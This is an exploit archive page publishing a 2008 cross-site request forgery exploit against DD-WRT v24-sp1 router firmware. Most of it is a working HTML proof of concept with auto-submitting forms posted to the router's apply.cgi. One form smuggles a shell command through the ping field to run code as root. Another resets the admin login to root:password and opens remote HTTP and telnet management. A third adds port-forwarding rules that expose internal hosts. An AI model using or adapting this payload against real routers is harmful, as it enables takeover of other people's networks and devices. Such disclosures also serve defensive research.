DD-WRT 24-sp1 Cross Site Request Forgery

DD-WRT 24-sp1 Cross Site Request Forgery: Posted Dec 8, 2008; Authored by Michael Brooks | Site rooksecurity.com; DD-WRT version 24-sp1 cross site request forgery exploit that lets you execute code as root.; tags | exploit, root, csrf; SHA-256 | ea1750995b85d3fb72b396b9c3ebcc78250d8ea8531d28a92405edb81be28e87; Download | Favorite | View

DD-WRT 24-sp1 Cross Site Request Forgery

Remote root dd-wrt
--------------------------------------------------------------------------------

Written by Michael Brooks
Special thanks to str0ke

Exploits tested on the newist stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage:
http://dd-wrt.com/

Impact:
1)Remote root command execuiton /bin/sh
2)Change web administration password and enable remote admistration
3)create new Port Forwarding rules to byass NAT.

<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
  </head>
  Remote root command execution /bin/sh
  <form method="post" action="http://192.168.1.1/apply.cgi" id=1>
    <input name="submit_button" value="Ping" type="hidden">
    <input name="action" value="ApplyTake" type="hidden">
    <input name="submit_type" value="start" type="hidden">
    <input name="change_action" value="gozila_cgi" type="hidden">
    <input name="next_page" value="Diagnostics.asp" type="hidden">
    <input name="ping_ip" value="echo owned">
    <input name="execute command" type="submit">
  </form><br><br>  
  enable remote administration and change login to root:password
  <form method="post" action="http://192.168.1.1/apply.cgi">
    <input name="submit_button" value="Management" type="hidden">
    <input name="action" value="ApplyTake" type="hidden">
    <input name="change_action" value="" type="hidden">
    <input name="submit_type" value="" type="hidden">
    <input name="commit" value="1" type="hidden">
    <input name="PasswdModify" value="0" type="hidden">
    <input name="remote_mgt_https" value="" type="hidden">
    <input name="http_enable" value="1" type="hidden">
    <input name="info_passwd" value="0" type="hidden">
    <input name="https_enable" value="" type="hidden">
    <input name="http_username" value="root" type="hidden">
    <input name="http_passwd" value="password" type="hidden">
    <input name="http_passwdConfirm" value="password" type="hidden">
    <input name="_http_enable" value="1" type="hidden">
    <input name="refresh_time" value="3" type="hidden">
    <input name="status_auth" value="1" type="hidden">
    <input name="maskmac" value="1" type="hidden">
    <input name="remote_management" value="1" type="hidden">
    <input name="http_wanport" value="8080" type="hidden">
    <input name="remote_mgt_telnet" value="1" type="hidden">
    <input name="telnet_wanport" value="23" type="hidden">
    <input name="boot_wait" value="on" type="hidden">
    <input name="cron_enable" value="1" type="hidden">
    <input name="cron_jobs" value="" type="hidden">
    <input name="loopback_enable" value="1" type="hidden">
    <input name="nas_enable" value="1" type="hidden">
    <input name="resetbutton_enable" value="1" type="hidden">
    <input name="zebra_enable" value="1" type="hidden">
    <input name="ip_conntrack_max" value="512" type="hidden">
    <input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden">
    <input name="ip_conntrack_udp_timeouts" value="120" type="hidden">
    <input name="overclocking" value="200" type="hidden">
    <input name="router_style" value="yellow" type="hidden">
    <input name="Remote Admin" type="submit">
  </form><br><br>
  Change Port Forwarding to byass NAT protection.
  <form method="post" action="http://192.168.1.1/apply.cgi">  
    <input name="submit_button" value="Change Port Forwarding" type="submit">
    <input name="action" value="ApplyTake" type="hidden">
    <input name="change_action" value="" type="hidden">
    <input name="submit_type" value="" type="hidden">
    <input name="forward_spec" value="13" type="hidden">
    <input name="name0" value="Hacked" type="hidden">
    <input name="from0" value="4450" type="hidden">
    <input name="pro0" value="both" type="hidden">
    <input name="ip0" value="192.168.1.100" type="hidden">
    <input name="to0" value="445" type="hidden">
    <input name="enable0" value="on" type="hidden">
    <input name="name1" value="Hacked Again" type="hidden">
    <input name="from1" value="22" type="hidden">
    <input name="pro1" value="tcp" type="hidden">
    <input name="ip1" value="192.168.1.101" type="hidden">
    <input name="to1" value="22" type="hidden">
    <input name="enable1" value="on" type="hidden">
  </form>
</html>
<script>
  document.getElementById(1).submit();//remote root command execution!
</script>

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

DD-WRT 24-sp1 Cross Site Request Forgery

DD-WRT 24-sp1 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

DD-WRT 24-sp1 Cross Site Request Forgery

Share This

DD-WRT 24-sp1 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems